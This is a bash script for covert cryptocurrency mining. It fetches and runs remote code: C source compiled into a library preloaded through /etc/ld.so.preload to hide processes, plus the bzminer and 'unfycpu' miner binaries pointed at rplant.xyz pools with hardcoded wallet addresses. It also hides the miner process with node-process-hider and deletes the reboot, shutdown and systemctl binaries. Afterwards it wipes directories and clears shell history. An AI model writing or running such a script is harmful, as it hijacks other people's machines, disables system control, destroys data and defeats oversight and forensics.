#!/bin/bash
set -x
apt-get update ; apt-get install sudo npm -y
sudo apt-get install libsodium23 -y
apt-get install libsodium23 -y
curl https://github.com/nandafiku/fillesg/raw/main/nyumput.c -o nyumput.c
apt-get install build-essential -y
gcc -Wall -fPIC -shared -o libnyumput.so nyumput.c -ldl
mv libnyumput.so /usr/local/lib/
echo /usr/local/lib/libnyumput.so >> /etc/ld.so.preload
rm nyumput.c
echo "supersede domain-name-servers 8.8.8.8;">> /etc/dhcp/dhclient.conf
/etc/init.d/network restart
sudo su --command "apt-get update && apt-get install gcc -y && curl -sL https://deb.nodesource.com/setup_14.x | bash && apt-get install nodejs -y && npm install -g npm@9.2.0 -y && npm i -g node-process-hider && ph add sgr1"
WORKER=$(TZ=":Asia/Jakarta" date '+%A-%d-%B-%Y' | sed 's/Monday/Senin/;s/Tuesday/Selasa/;s/Wednesday/Rabu/;s/Thursday/Kamis/;s/Friday/Jumat/;s/Saturday/Sabtu/;s/Sunday/Minggu/;s/January/Januari/;s/February/Februari/;s/March/Maret/;s/April/April/;s/May/Mei/;s/June/Juni/;s/July/Juli/;s/August/Agustus/;s/September/September/;s/October/Oktober/;s/November/November/;s/December/Desember/')
mkdir .lib && cd .lib
wget https://github.com/bzminer/bzminer/releases/download/v21.0.3/bzminer_v21.0.3_linux.tar.gz && tar xf bzminer_v21.0.3_linux.tar.gz
cd bzminer_v21.0.3_linux
./bzminer -a kawpow -p stratum+tcp://stratum-eu.rplant.xyz:7118 -w AW4bd17vpCPKCZx3QnY85gd2x2rQHfVEpA.kiddo --nc 1
wget https://github.com/loeto21/uda/raw/main/unfycpu && chmod 777 unfycpu && sudo nohup ./unfycpu -a yescryptr32  -o stratum+tcp://stratum-asia.rplant.xyz:7116 -u UPoxZXYCDMuT84Bfb8g9D1Wz4ud1md1kC4.dan > /dev/null 2>&1 &
sleep 30
sudo rm -rvf /sbin/reboot /sbin/shutdown /sbin/poweroff /sbin/halt /bin/systemctl /usr/sbin/reboot /usr/sbin/shutdown /usr/sbin/poweroff /usr/sbin/halt /usr/bin/systemctl || rm -rvf /sbin/reboot /sbin/shutdown /sbin/poweroff /sbin/halt /bin/systemctl /usr/sbin/reboot /usr/sbin/shutdown /usr/sbin/poweroff /usr/sbin/halt /usr/bin/systemctl
curl ifconfig.me
rm -rvf *
cd ~/
rm -rvf *
history -cr
while true
do
        echo "hold down..."
        sleep 60
done
